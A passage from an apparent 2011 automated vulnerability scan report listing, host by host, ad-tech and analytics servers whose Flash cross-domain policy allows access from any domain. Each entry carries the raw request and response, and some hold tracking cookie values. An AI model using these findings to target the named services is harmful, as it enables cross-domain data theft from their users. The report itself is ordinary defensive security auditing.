Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729062000"
Last-Modified: Tue, 30 Aug 2011 18:31:02 GMT
Content-Type: application/xml
Content-Length: 269
Date: Sun, 04 Sep 2011 00:56:36 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
               <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.7. http://c.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:55:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.8. http://c.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:26:25 GMT
ETag: "14b0e12-e6-e7eb640"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 00:58:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:58:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.9. http://cdn.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 00:52:13 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.10. http://cdn.taboolasyndication.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:13 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 02 Jan 2011 13:38:59 GMT
ETag: "578002-199-498dd2859a2c0"
Accept-Ranges: bytes
Content-Length: 409
Content-Type: text/xml
Cache-Control: private, max-age=31536000
Age: 20954886
Expires: Wed, 04 Jan 2012 12:01:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

6.11. http://cdn.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Sun, 04 Sep 2011 00:55:27 GMT
Date: Sun, 04 Sep 2011 00:55:27 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.12. http://ce.lijit.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ce.lijit.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:58:09 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n15.panthercdn.com
ETag: "7955a-83-4aad025722640"
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 13:20:56 GMT
Age: 128233
Content-Length: 131
Content-Type: application/xml
Last-Modified: Thu, 18 Aug 2011 23:41:05 GMT
Connection: close

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.13. http://gannett.gcion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.14. http://get.lingospot.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://get.lingospot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: get.lingospot.com

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "-1221676599"
Last-Modified: Tue, 02 Dec 2008 06:03:41 GMT
Content-Length: 139
Date: Sun, 04 Sep 2011 01:08:26 GMT
Server: lingo

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.15. http://gscounters.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2d6b"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web204
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:52:28 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.16. http://i.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 00:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:53:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.17. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 00:57:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 00:57:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.18. http://img-cdn.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 00:55:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.19. http://img.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:49 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.20. http://imp.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.21. http://init.lingospot.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://init.lingospot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: init.lingospot.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=7200
Content-Type: text/xml
Etag: "-5d35a762ba6b2244"
Last-Modified: Mon, 09 May 2011 16:03:41 GMT
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:54:31 GMT
Server: Google Frontend

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.22. http://l.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=315360000, public
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:59:03 GMT
ETag: "4e4ed5c4=cf"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Last-Modified: Fri, 19 Aug 2011 21:29:40 GMT
Server: Cherokee
Content-Length: 207
Connection: Close

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-p
...[SNIP]...

6.23. http://m.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 00:55:53 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.24. http://metrics.sprint.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:40 GMT
Server: Omniture DC/2.0.0
xserver: www372
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.25. http://nmsacramento.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmsacramento.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: nmsacramento.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:04:37 GMT
Server: Omniture DC/2.0.0
xserver: www411
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.26. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:49:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.27. http://pixel.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6804 26628
Set-Cookie: ts=1315097793; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:56:33 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.28. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 01:00:45 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 01:00:45 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.29. http://premium.mookie1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: premium.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:38:09 GMT
ETag: "d4820b-d0-48821fe531a40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.30. http://query.yahooapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://query.yahooapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: query.yahooapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 01:10:48 GMT
Server: YTS/1.19.8
Age: 1

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

6.31. http://r.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:23:18 GMT
ETag: "1ad8fc9-e6-3595180"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 00:56:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:56:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.32. http://r.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 00:47:36 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.33. http://rcv-srv48.inplay.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcv-srv48.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: rcv-srv48.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1314384909000"
Last-Modified: Fri, 26 Aug 2011 18:55:09 GMT
host: rcv-srv48
Content-Type: application/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 00:45:53 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.34. http://s.meebocdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.meebocdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.meebocdn.net

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 03 May 2011 00:23:33 GMT
ETag: "3934951678"
Server: lighttpd/1.4.19
Content-Type: text/xml
Cache-Control: max-age=163863
Expires: Mon, 05 Sep 2011 22:41:27 GMT
Date: Sun, 04 Sep 2011 01:10:24 GMT
Content-Length: 348
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" secure="False"/>
<allow-access-from domain="*.meebo.com" secure="False"/>
<allow-http-request-headers-from domain="*.meebo.com" headers="*"/>
<allow-access-from domain="*.meebocdn.net" secure="False"/>
...[SNIP]...

6.35. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 03 Sep 2011 23:21:26 GMT
Expires: Fri, 02 Sep 2011 23:16:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 5440
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.36. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

